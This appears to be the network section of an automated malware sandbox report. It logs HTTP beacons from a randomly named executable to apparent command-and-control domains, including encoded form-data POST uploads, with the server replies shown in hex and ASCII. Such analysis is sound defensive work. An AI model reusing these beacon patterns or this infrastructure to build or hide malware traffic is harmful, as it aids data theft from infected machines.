78 52 31 75 6b 34 35 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=8pKw1ThT2h2RYLyGdv2JEiFwzkiVgLhBiNTZtQ5LL9mHaylAjYAe7OwU7nh5nTAkCXJXdpqB5Gf5/3Q0FtMRrxehJDPIilC4ELqGCM8DW+llLYb2p2nhbKG8w1ESm6RkLDFG5fXfCZ/7I/ZuYBt5evbTVkclv7fwfZ6/3zmm3Dk33lF3Hc6EqZD8PLxtDCIzXvlB81QUtyZerPRYwPWFCinv8xjRJgKXlj7OekOhddrqbvgenYfQz1I4e0t/w/9+phP/3pDKFpFLspkQzJyNHjLodty8vI+Fi1rDE7Psc+hdylw6c0fIdHCZaH3MJxcq2LPxR1uk45egytXqkRJrLSROcyS2mF2j/J5IdOvB8JUFOO5ldBzwkLuU2xr4fueEUIfN4cjvyF9LCmPJVZXaKYiJdBiUjdfnTdlnIvUQZBVhINTxBM/aDOcauaHJztkI9XwuYHc7+lzQ2BMBoqzSVC19e2weCwRwpoqjVwqST/qPQoGkXhTEGRHfjxGU3jUuMFq9hC6jH0M1C/0A5Y7/fFVqUcHGTEiRlaP80Kyi6S10oWnulg11jlweHGvMtMomFmAuXIW/HPiOzZPlAoM3iULxP4b08WiUYaR733Y38vrVZXvfLXyb3GUn6ZvjBPJv0CcW3z6JkKK5ShS7VA7aDvZPVH5j8oI80/uo7tQNc8gV5DkTrJ8D7L9hN5Hr8NWd1FMlAE1qKyojbbm6ETk3z6aXXs/uuRMeFjU+BxCNI4wkSIybbC5LePAvRLHUmBoRjTsBBUbBNj1pc5fhDDTGRDvBZCnhwlK+70CjXzNLL401eoDyDDp/0mljDcrNlmGzGI+N5R9H8ck1oVVCwctIc/hdL4n6NKNsHaQBpdhossbvPXnCnndZ46K2VLg1wQlz4fzxese+QcaB9JVSDLzJdjxogmAeUjbeIk/t5WltogdHYKH+r6OraRc/vJU247bdeGjiPXe6JfwSPmyPHe75pMGi2V3OWB7Y32pvylDhl+lk [TRUNCATED]
                                                          Nov 5, 2024 15:44:10.292805910 CET393INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:10 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.4500278.217.17.192802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:11.874686003 CET451OUTGET /y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:44:12.878463030 CET393INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:12 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.45002878.141.202.204802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:18.905379057 CET712OUTPOST /mszq/ HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bdipjg.asia
                                                          Referer: http://www.bdipjg.asia/mszq/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6e 78 39 48 38 50 4b 72 35 4d 47 42 66 76 69 52 4f 51 44 4a 71 33 4e 47 50 62 36 4d 70 68 6c 63 7a 6b 44 68 39 50 76 51 48 72 36 47 46 4d 76 4e 6d 42 33 41 53 47 66 47 30 6f 31 6d 78 35 6d 6c 38 72 55 62 47 46 38 47 64 58 6b 33 54 37 6d 63 34 6b 75 42 2f 4d 52 72 35 69 74 64 61 48 4d 7a 68 77 72 48 2f 4c 4e 4c 31 62 31 32 61 36 67 56 77 39 42 2b 76 6a 39 56 75 74 61 43 54 64 64 38 73 41 48 37 78 43 6a 75 45 73 77 67 2b 30 58 6e 6a 2b 37 62 73 53 4d 61 6e 74 77 70 45 43 78 44 57 54 67 5a 69 76 50 78 72 38 56 2f 69 42 33 45 71 4b 6d 39 41 53 34 43 46 6c 31 7a 37 4d 46 6d 34 67 3d 3d
                                                          Data Ascii: H0kxIVc=nx9H8PKr5MGBfviROQDJq3NGPb6MphlczkDh9PvQHr6GFMvNmB3ASGfG0o1mx5ml8rUbGF8GdXk3T7mc4kuB/MRr5itdaHMzhwrH/LNL1b12a6gVw9B+vj9VutaCTdd8sAH7xCjuEswg+0Xnj+7bsSMantwpECxDWTgZivPxr8V/iB3EqKm9AS4CFl1z7MFm4g==
                                                          Nov 5, 2024 15:44:19.697069883 CET399INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.45002978.141.202.204802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:21.456774950 CET732OUTPOST /mszq/ HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bdipjg.asia
                                                          Referer: http://www.bdipjg.asia/mszq/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6e 78 39 48 38 50 4b 72 35 4d 47 42 51 75 53 52 4a 77 2f 4a 74 58 4d 30 53 72 36 4d 77 52 6b 56 7a 6b 50 68 39 4f 36 49 48 5a 65 47 46 70 54 4e 6e 41 33 41 54 47 66 47 74 59 31 6a 31 35 6d 55 38 72 59 69 47 45 73 47 64 58 77 33 54 36 36 63 34 7a 43 43 35 63 52 70 2f 69 74 66 43 6e 4d 7a 68 77 72 48 2f 4c 4a 68 31 62 4e 32 61 4b 51 56 32 63 42 39 68 44 39 57 70 74 61 43 58 64 64 34 73 41 48 4a 78 44 50 41 45 76 49 67 2b 31 6e 6e 6a 76 37 45 6d 53 4d 6d 70 4e 77 38 55 41 52 4f 63 77 64 50 6f 70 58 46 72 59 6c 74 71 6e 6d 65 37 37 48 71 53 53 63 78 59 69 38 48 32 50 34 76 6a 73 61 63 73 74 30 33 4e 67 66 6e 79 45 6b 74 57 4c 6f 6a 42 75 63 3d
                                                          Data Ascii: H0kxIVc=nx9H8PKr5MGBQuSRJw/JtXM0Sr6MwRkVzkPh9O6IHZeGFpTNnA3ATGfGtY1j15mU8rYiGEsGdXw3T66c4zCC5cRp/itfCnMzhwrH/LJh1bN2aKQV2cB9hD9WptaCXdd4sAHJxDPAEvIg+1nnjv7EmSMmpNw8UAROcwdPopXFrYltqnme77HqSScxYi8H2P4vjsacst03NgfnyEktWLojBuc=
                                                          Nov 5, 2024 15:44:22.279025078 CET399INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.45003078.141.202.204802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:24.009546995 CET10814OUTPOST /mszq/ HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bdipjg.asia
                                                          Referer: http://www.bdipjg.asia/mszq/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6e 78 39 48 38 50 4b 72 35 4d 47 42 51 75 53 52 4a 77 2f 4a 74 58 4d 30 53 72 36 4d 77 52 6b 56 7a 6b 50 68 39 4f 36 49 48 5a 57 47 45 62 72 4e 6d 6a 66 41 51 47 66 47 6c 34 31 69 31 35 6d 4a 38 6f 70 71 47 42 31 7a 64 52 30 33 52 59 79 63 76 33 57 43 77 63 52 70 79 43 74 65 61 48 4e 7a 68 30 50 62 2f 4c 5a 68 31 62 4e 32 61 4a 49 56 68 64 42 39 6a 44 39 56 75 74 61 47 54 64 64 51 73 45 53 2b 78 44 37 2b 45 65 6f 67 2f 56 33 6e 6c 5a 50 45 75 53 4d 65 71 4e 78 35 55 41 63 4f 63 77 52 31 6f 70 4b 51 72 66 56 74 76 47 69 46 73 34 44 4c 57 52 4e 70 49 6a 55 41 34 66 6b 71 71 4e 43 65 6f 34 30 37 61 6a 2f 45 6f 56 35 50 43 65 38 41 43 59 53 64 47 76 75 41 51 4f 77 68 37 41 55 4e 73 61 53 65 57 34 46 74 33 6b 6d 65 58 71 44 4d 35 50 42 5a 76 46 7a 71 6c 49 5a 6d 49 53 63 6f 6d 75 50 75 4c 43 6b 38 6d 4d 74 69 59 57 79 6d 63 50 35 70 30 73 78 59 34 6e 2b 59 74 36 7a 47 59 39 6c 4f 71 47 4d 49 4a 38 62 5a 45 59 6f 7a 53 46 5a 66 41 2b 54 43 55 73 5a 67 61 63 6c 67 77 41 57 6f 61 44 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=nx9H8PKr5MGBQuSRJw/JtXM0Sr6MwRkVzkPh9O6IHZWGEbrNmjfAQGfGl41i15mJ8opqGB1zdR03RYycv3WCwcRpyCteaHNzh0Pb/LZh1bN2aJIVhdB9jD9VutaGTddQsES+xD7+Eeog/V3nlZPEuSMeqNx5UAcOcwR1opKQrfVtvGiFs4DLWRNpIjUA4fkqqNCeo407aj/EoV5PCe8ACYSdGvuAQOwh7AUNsaSeW4Ft3kmeXqDM5PBZvFzqlIZmIScomuPuLCk8mMtiYWymcP5p0sxY4n+Yt6zGY9lOqGMIJ8bZEYozSFZfA+TCUsZgaclgwAWoaDhIZpse89qL6gba98n8ec4IVftrAl/eO3okLfqpP91yibVuZnLLzUfkvuGtCUkRcCBpL88jM7Wmn+ymqwe+S8HjMOPKL/YlLxgSlNPmPVSvwt/6EKuau7WShuwl26kpc3F6lKA+4NItxcmlYdXPDW2EoWJLTRBAIEfkOphqKDJ14yHCFskwwnSW/28YeIoUuHkwKvscY/GXXkKb18c6UB+IQXdXFdnPsn/n/1Icn1q5PHLFjtdUaxzQPRWC7gNaBGTAcGNrHkaAoS7PRca/foK1UmIydwaHpRXAb816Qdv6GH1/GbcVECLkx9H33E2EAsnDxd+5IAFu4mi4+6oKdvh0uwOk9QA97j807h+hDIz/4ttSvp6tHt0rHfesRs9yjkhp1NARu0I7lf3uzPQSjqAeEVeHw9zm6DCMyD4+X6nleFp/uZrlNmhfrNmIVhxtY9oYtmjcyAJuxGX2djozoF8aScBMEmqWq7UIgkQERVtLWVuD5wIvbcc+bEXbo5DO3+HrTVf9YPlVwdJJ8yR3e0a7VGU+g4wlZoIrncc0RDj0q60UA3CTz2KRTwUUgmOVG7rYVfoCGziG1rW9RX/+WzIs0PdO2tesXaqRcdCvP6Tk0Youj3bS3dw8Bh1nywivjCT+JYUhzbF3MiRsHO8ZyzsJSqKFnPM38TDO [TRUNCATED]
                                                          Nov 5, 2024 15:44:24.812372923 CET399INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.45003178.141.202.204802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:26.547631979 CET446OUTGET /mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.bdipjg.asia
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:44:27.334160089 CET541INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:44:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.450032184.94.215.26802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:32.889556885 CET709OUTPOST /sm4f/ HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.sortcy.top
                                                          Referer: http://www.sortcy.top/sm4f/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4a 59 73 73 6f 68 33 69 71 43 58 63 59 59 64 62 6f 38 48 59 4e 45 47 37 33 30 6c 65 2f 63 57 67 71 2b 47 4a 6e 75 65 6a 53 45 72 36 46 64 56 75 6f 30 46 34 37 53 7a 4f 74 6a 4e 72 51 76 62 2b 32 51 55 43 70 6c 62 58 4f 50 45 34 66 34 41 6e 55 36 73 31 2b 39 57 31 34 4d 4e 73 6e 49 4a 4e 66 7a 2f 52 42 2b 37 68 67 63 55 4a 5a 42 30 50 4b 6e 6b 30 6a 56 78 6c 2b 37 45 44 61 33 78 36 56 74 2f 70 59 76 6c 48 52 62 51 7a 57 2b 53 46 5a 6a 42 2b 4b 68 2f 56 36 74 7a 78 69 52 70 50 6c 69 63 4c 68 4a 71 75 44 66 74 76 71 42 42 43 6a 65 7a 37 56 6d 66 36 50 4d 77 75 35 2b 76 4c 32 77 3d 3d
                                                          Data Ascii: H0kxIVc=JYssoh3iqCXcYYdbo8HYNEG730le/cWgq+GJnuejSEr6FdVuo0F47SzOtjNrQvb+2QUCplbXOPE4f4AnU6s1+9W14MNsnIJNfz/RB+7hgcUJZB0PKnk0jVxl+7EDa3x6Vt/pYvlHRbQzW+SFZjB+Kh/V6tzxiRpPlicLhJquDftvqBBCjez7Vmf6PMwu5+vL2w==
                                                          Nov 5, 2024 15:44:33.582989931 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:33 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:33.583009958 CET1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                          Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                          Nov 5, 2024 15:44:33.583020926 CET1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                          Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                          Nov 5, 2024 15:44:33.583159924 CET1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                          Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                          Nov 5, 2024 15:44:33.583172083 CET1236INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
